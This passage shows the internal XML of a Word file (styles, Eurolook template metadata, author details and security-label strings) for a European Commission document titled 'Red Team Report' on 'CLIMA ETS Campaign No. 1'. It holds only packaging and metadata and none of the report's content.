    <w:name w:val="746D911518154AEC8B1C27992CFA98B0"/>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3A023E704D8E4DD79D71542E755B3DE1">
    <w:name w:val="3A023E704D8E4DD79D71542E755B3DE1"/>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B33DE9DFB7F543D8B244F6B2BD1AAD37">
    <w:name w:val="B33DE9DFB7F543D8B244F6B2BD1AAD37"/>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1EFB02F20A3F4605ADB69E0325D6D5F2">
    <w:name w:val="1EFB02F20A3F4605ADB69E0325D6D5F2"/>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6187112204064D41BF775EAB15DA5799">
    <w:name w:val="6187112204064D41BF775EAB15DA5799"/>
    <w:rsid w:val="00770C67"/>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7FDA3514B9D043F28F9E5ABD9B245C90">
    <w:name w:val="7FDA3514B9D043F28F9E5ABD9B245C90"/>
    <w:rsid w:val="00770C67"/>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3FBE7E18E9C64B3D8D6586CE3A6E6447">
    <w:name w:val="3FBE7E18E9C64B3D8D6586CE3A6E6447"/>
    <w:rsid w:val="00770C67"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3A94583CAF5141B3A842DC56EC8FC38D">
    <w:name w:val="3A94583CAF5141B3A842DC56EC8FC38D"/>
    <w:rsid w:val="00770C67"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IE" w:eastAsia="en-I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urolookProperties>
  <ProductCustomizationId>EC</ProductCustomizationId>
  <Created>
    <Version>10.0.45789.0</Version>
    <Date>2024-01-22T11:03:40</Date>
    <Language>EN</Language>
    <Note>Upgraded from EL4.6 (tech.dot)</Note>
  </Created>
  <Edited>
    <Version/>
    <Date/>
  </Edited>
  <DocumentModel>
    <Id>34954475-997f-4cb0-a95b-7f65298f3d8c</Id>
    <Name>Report (long)</Name>
  </DocumentModel>
  <CustomTemplate>
    <Id/>
    <Name/>
  </CustomTemplate>
  <DocumentDate>2025-11-05T00:00:00</DocumentDate>
  <DocumentVersion>1.0</DocumentVersion>
  <CompatibilityMode>Eurolook10</CompatibilityMode>
  <DocumentMetadata>
    <EC_SecurityDistributionDG MetadataSerializationType="SimpleValue">DIGIT.B4, DIGIT.C1, DIGIT.C3, DIGIT.C4, DIGIT.S1, DIGIT.S2</EC_SecurityDistributionDG>
    <EC_SecurityDateMarkingDate MetadataSerializationType="SimpleValue"/>
    <EC_SecurityReleasability MetadataSerializationType="SimpleValue"/>
    <EC_SecurityDistributionSensitive MetadataSerializationType="SimpleValue">DG</EC_SecurityDistributionSensitive>
    <EC_SecurityDateMarking MetadataSerializationType="SimpleValue"/>
    <EC_SecurityMarking MetadataSerializationType="SimpleValue">SENSITIVE</EC_SecurityMarking>
    <EC_SecurityDistributionSpecialHandling MetadataSerializationType="SimpleValue"/>
    <EC_SecurityDistributionWorkingGroup MetadataSerializationType="SimpleValue"/>
    <EC_SecurityDateMarkingEvent MetadataSerializationType="SimpleValue"/>
  </DocumentMetadata>
</EurolookProperties>
</file>

<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
<Author Role="Creator" AuthorRoleName="Writer" AuthorRoleId="a4fbaff4-b07c-48b4-a21e-e7b9eedf3796">
  <Id>240fbc2e-4a1b-4ab8-8ddb-1b6e93a0bdfe</Id>
  <Names>
    <Latin>
      <FirstName>Ioannis</FirstName>
      <LastName>MONOGIOUDIS</LastName>
    </Latin>
    <Greek>
      <FirstName/>
      <LastName/>
    </Greek>
    <Cyrillic>
      <FirstName/>
      <LastName/>
    </Cyrillic>
    <DocumentScript>
      <FirstName>Ioannis</FirstName>
      <LastName>MONOGIOUDIS</LastName>
      <FullName>DIGIT.S1.SA</FullName>
    </DocumentScript>
  </Names>
  <Initials>IM</Initials>
  <Gender>m</Gender>
  <Email>Ioannis.MONOGIOUDIS@ext.ec.europa.eu</Email>
  <Service>DIGIT.S.1.007</Service>
  <Function ADCode="" ShowInSignature="true" ShowInHeader="false" HeaderText=""/>
  <WebAddress/>
  <FunctionalMailbox/>
  <InheritedWebAddress>WebAddress</InheritedWebAddress>
  <OrgaEntity1>
    <Id>57b98c8b-929b-485e-b187-59f180e10ead</Id>
    <LogicalLevel>1</LogicalLevel>
    <Name>DIGIT</Name>
    <HeadLine1>DIRECTORATE-GENERAL FOR DIGITAL SERVICES </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0d3a8f15-5be4-48b2-a334-d8f902076d99</Id>
    <LogicalLevel>2</LogicalLevel>
    <Name>DIGIT.S</Name>
    <HeadLine1>Directorate S – Cybersecurity</HeadLine1>
    <HeadLine2/>
    <PrimaryAddressId>f03b5801-04c9-4931-aa17-c6d6c70bc579</PrimaryAddressId>
    <SecondaryAddressId>1264fb81-f6bb-475e-9f9d-a937d3be6ee2</SecondaryAddressId>
    <WebAddress/>
    <InheritedWebAddress>WebAddress</InheritedWebAddress>
    <ShowInHeader>true</ShowInHeader>
  </OrgaEntity2>
  <OrgaEntity3>
    <Id>978a139c-2225-4f56-b771-b7d2cdc6eed0</Id>
    <LogicalLevel>3</LogicalLevel>
    <Name>DIGIT.S.1</Name>
    <HeadLine1>DIGIT.S.1 – Cybersecurity Policy Implementation</HeadLine1>
    <HeadLine2/>
    <PrimaryAddressId>f03b5801-04c9-4931-aa17-c6d6c70bc579</PrimaryAddressId>
    <SecondaryAddressId>1264fb81-f6bb-475e-9f9d-a937d3be6ee2</SecondaryAddressId>
    <WebAddress/>
    <InheritedWebAddress>WebAddress</InheritedWebAddress>
    <ShowInHeader>true</ShowInHeader>
  </OrgaEntity3>
  <Hierarchy>
    <OrgaEntity>
      <Id>57b98c8b-929b-485e-b187-59f180e10ead</Id>
      <LogicalLevel>1</LogicalLevel>
      <Name>DIGIT</Name>
      <HeadLine1>DIRECTORATE-GENERAL FOR DIGITAL SERVICES </HeadLine1>
      <HeadLine2/>
      <PrimaryAddressId>1264fb81-f6bb-475e-9f9d-a937d3be6ee2</PrimaryAddressId>
      <SecondaryAddressId>f03b5801-04c9-4931-aa17-c6d6c70bc579</SecondaryAddressId>
      <WebAddress>WebAddress</WebAddress>
      <InheritedWebAddress>WebAddress</InheritedWebAddress>
      <ShowInHeader>true</ShowInHeader>
    </OrgaEntity>
    <OrgaEntity>
      <Id>0d3a8f15-5be4-48b2-a334-d8f902076d99</Id>
      <LogicalLevel>2</LogicalLevel>
      <Name>DIGIT.S</Name>
      <HeadLine1>Directorate S – Cybersecurity</HeadLine1>
      <HeadLine2/>
      <PrimaryAddressId>f03b5801-04c9-4931-aa17-c6d6c70bc579</PrimaryAddressId>
      <SecondaryAddressId>1264fb81-f6bb-475e-9f9d-a937d3be6ee2</SecondaryAddressId>
      <WebAddress/>
      <InheritedWebAddress>WebAddress</InheritedWebAddress>
      <ShowInHeader>true</ShowInHeader>
    </OrgaEntity>
    <OrgaEntity>
      <Id>978a139c-2225-4f56-b771-b7d2cdc6eed0</Id>
      <LogicalLevel>3</LogicalLevel>
      <Name>DIGIT.S.1</Name>
      <HeadLine1>DIGIT.S.1 – Cybersecurity Policy Implementation</HeadLine1>
      <HeadLine2/>
      <PrimaryAddressId>f03b5801-04c9-4931-aa17-c6d6c70bc579</PrimaryAddressId>
      <SecondaryAddressId>1264fb81-f6bb-475e-9f9d-a937d3be6ee2</SecondaryAddressId>
      <WebAddress/>
      <InheritedWebAddress>WebAddress</InheritedWebAddress>
      <ShowInHeader>true</ShowInHeader>
    </OrgaEntity>
  </Hierarchy>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1264fb81-f6bb-475e-9f9d-a937d3be6ee2</AddressId>
    <Fax/>
    <Phone>+352 4301-30071</Phone>
    <Office>DRB- A0/036</Office>
  </MainWorkplace>
  <Workplaces>
    <Workplace IsMain="true">
      <AddressId>1264fb81-f6bb-475e-9f9d-a937d3be6ee2</AddressId>
      <Fax/>
      <Phone>+352 4301-30071</Phone>
      <Office>DRB- A0/036</Office>
    </Workplace>
  </Workplaces>
</Author>
</file>

<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
<Texts>
  <SensitiveFootnoteHyperlink>{field:HYPERLINK "https://europa.eu/!db43PX" |https://europa.eu/!db43PX}</SensitiveFootnoteHyperlink>
  <SecuritySecurityMatter>Security Matter</SecuritySecurityMatter>
  <SensitiveLabel>Sensitive</SensitiveLabel>
  <SensitiveHandling>Distribution only on a need-to-know basis. Do not read or carry openly in public places. Must be encrypted in transmission and stored securely, where possible by using encrypted storage. Destroy copies by shredding or secure deletion. Full handling instructions: </SensitiveHandling>
  <LabelFormattedTableSeqEC>Table {field: SEQ Table \* ARABIC }: </LabelFormattedTableSeqEC>
  <MarkingUntilText>UNTIL</MarkingUntilText>
  <OrgaRoot>EUROPEAN COMMISSION</OrgaRoot>
  <SecurityPharma>Pharma Investigations</SecurityPharma>
  <ClimaSensitive>CLIMA</ClimaSensitive>
  <SecurityEmbargo>EMBARGO UNTIL</SecurityEmbargo>
  <Contact>Contact:</Contact>
  <Contacts>Contacts:</Contacts>
  <SecurityIasOperations>IAS Operations</SecurityIasOperations>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SensitiveFootnoteHyperlinkIASOperations>Handling instructions for SENSITIVE information are given at {field: HYPERLINK "https://europa.eu/!db43PX" |https://europa.eu/!db43PX}.</SensitiveFootnoteHyperlinkIASOperations>
  <LabelFigureSeqEC>Figure {SEQ Figure \* ARABIC }: </LabelFigureSeqEC>
  <LabelFigureSeqWChapter>Table {field: STYLEREF "Chapter Number" \s }.{field: SEQ Table \* ARABIC } –</LabelFigureSeqWChapter>
  <LabelSource>Source</LabelSource>
  <LabelTableSeqWChapter>Table { STYLEREF "Chapter Number" \s }.{ SEQ Table \* ARABIC } – </LabelTableSeqWChapter>
  <LabelTableSeqEC>Table {SEQ Table \* ARABIC }: </LabelTableSeqEC>
  <EmbargoUnlimited>Embargo (Unlimited)</EmbargoUnlimited>
  <TOCHeading>Table of Contents</TOCHeading>
  <SecurityCompOperations>COMP Operations</SecurityCompOperations>
  <SecurityOpinionLegalService>Opinion of the Legal Service</SecurityOpinionLegalService>
  <FooterPhone>Tel. direct line</FooterPhone>
  <FooterFax>Fax</FooterFax>
  <FooterOffice>Office:</FooterOffice>
  <PharmaSpecialHandlingLabel>Pharma Investigations</PharmaSpecialHandlingLabel>
  <SpecialHandlingFootnote>Special handling instructions are given at </SpecialHandlingFootnote>
  <PharmaSpecialHandlingHyperlink>{field:HYPERLINK "https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-Pharma-investigations.aspx?ln=en" |https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-Pharma-investigations.aspx?ln=en}</PharmaSpecialHandlingHyperlink>
  <SpecialHandlingLabel>Special Handling</SpecialHandlingLabel>
  <DAC.Line2>EMPLOYMENT, SOCIAL AFFAIRS AND INCLUSION</DAC.Line2>
  <DAC.Line3>REGIONAL AND URBAN POLICY</DAC.Line3>
  <DAC.Line1>DIRECTORATES-GENERAL</DAC.Line1>
  <CLIMASpecialHandlingHyperlink>{field:HYPERLINK "https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-DG-CLIMA.aspx?ln=en" |https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-DG-CLIMA.aspx?ln=en}</CLIMASpecialHandlingHyperlink>
  <CLIMASpecialHandlingLabel>CLIMA</CLIMASpecialHandlingLabel>
  <ContactFax>fax</ContactFax>
  <ContactTextPattern>%Name%[, %Function%][, %Office%][, %Phone%][, %Fax%][, %Email%][, %Dg%][, %Directorate%][, %Unit%]</ContactTextPattern>
  <ContactTel>tel.</ContactTel>
  <ContactOffice>office</ContactOffice>
  <SecurityMedicalSecret>Medical Secret</SecurityMedicalSecret>
  <TechHistoryCreatedBy>Document created by</TechHistoryCreatedBy>
  <TechHistoryDate>Date</TechHistoryDate>
  <TechHistory>Document History</TechHistory>
  <TechHistoryComment>Comment</TechHistoryComment>
  <TechHistoryVersion>Version</TechHistoryVersion>
  <SecurityStaffMatter>Staff Matter</SecurityStaffMatter>
  <SecurityMediationServiceMatter>Mediation Service</SecurityMediationServiceMatter>
  <SecurityReleasable>RELEASABLE TO:</SecurityReleasable>
  <TechPropsRefno>Reference Number:</TechPropsRefno>
  <TechPropsRevised>Revised by:</TechPropsRevised>
  <TechPropsVersion>Version:</TechPropsVersion>
  <TechPropsApproved>Approved by:</TechPropsApproved>
  <TechPropsAuthors>Authors:</TechPropsAuthors>
  <TechPropsPublic>Public:</TechPropsPublic>
  <TechPropsDate>Date:</TechPropsDate>
  <TechFooterVersion>Document Version</TechFooterVersion>
  <TechFooterDated>dated</TechFooterDated>
  <LabelPictureSeq>Figure {SEQ Figure \* ARABIC }: </LabelPictureSeq>
  <CourtProceduralDocuments>Court Procedural Documents</CourtProceduralDocuments>
  <SecurityInvestigationsDisciplinary>Investigations and Disciplinary Matters</SecurityInvestigationsDisciplinary>
  <SecurityOlafInvestigations>OLAF Investigations</SecurityOlafInvestigations>
  <OLAFSpecialHandlingLabel>OLAF Investigations</OLAFSpecialHandlingLabel>
  <OLAFSpecialHandlingHyperlink>{field:HYPERLINK "https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-OLAF-Investigations.aspx?ln=en" |https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-OLAF-Investigations.aspx?ln=en}</OLAFSpecialHandlingHyperlink>
  <LabelFormattedFigureSeqEC>Figure {field: SEQ Figure \* ARABIC }: </LabelFormattedFigureSeqEC>
  <COMPSpecialHandlingLabel>COMP</COMPSpecialHandlingLabel>
  <COMPSpecialHandlingHyperlink>{field:HYPERLINK "https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-DG-COMP.aspx?ln=en" |https://myintracomm.ec.europa.eu/corp/security/EN/newDS3/SensitiveInformation/Pages/SPECIAL-HANDLING-INFORMATION-DG-COMP.aspx?ln=en}</COMPSpecialHandlingHyperlink>
  <DateFormatShort>dd/MM/yyyy</DateFormatShort>
  <DateFormatLong>d MMMM yyyy</DateFormatLong>
</Texts>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DC1146FF-8CFB-4A2E-B591-DE2BF5614F6F}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Eurolook.dotm</Template>
  <TotalTime>54</TotalTime>
  <Pages>55</Pages>
  <Words>16506</Words>
  <Characters>94087</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <PresentationFormat>Microsoft Word 14.0</PresentationFormat>
  <Lines>784</Lines>
  <Paragraphs>220</Paragraphs>
  <ScaleCrop>true</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Red Team Report</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>110373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Report</dc:title>
  <dc:subject>CLIMA ETS Campaign No. 1</dc:subject>
  <dc:creator>MENGHI Sam (DIGIT)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MENGHI Sam (DIGIT)</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2025-11-05T16:23:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-05T15:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-05T16:27:00Z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urolookVersion">
    <vt:lpwstr>10.0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ELDocType">
    <vt:lpwstr>tech.dot</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_6bd9ddd1-4d20-43f6-abfa-fc3c07406f94_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_6bd9ddd1-4d20-43f6-abfa-fc3c07406f94_SetDate">
    <vt:lpwstr>2024-01-22T10:03:41Z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9ef16e41-360e-42c4-bff4-de2df67c2be6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_6bd9ddd1-4d20-43f6-abfa-fc3c07406f94_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="_DocHome">
    <vt:i4>940412567</vt:i4>
  </property>
</Properties>
</file>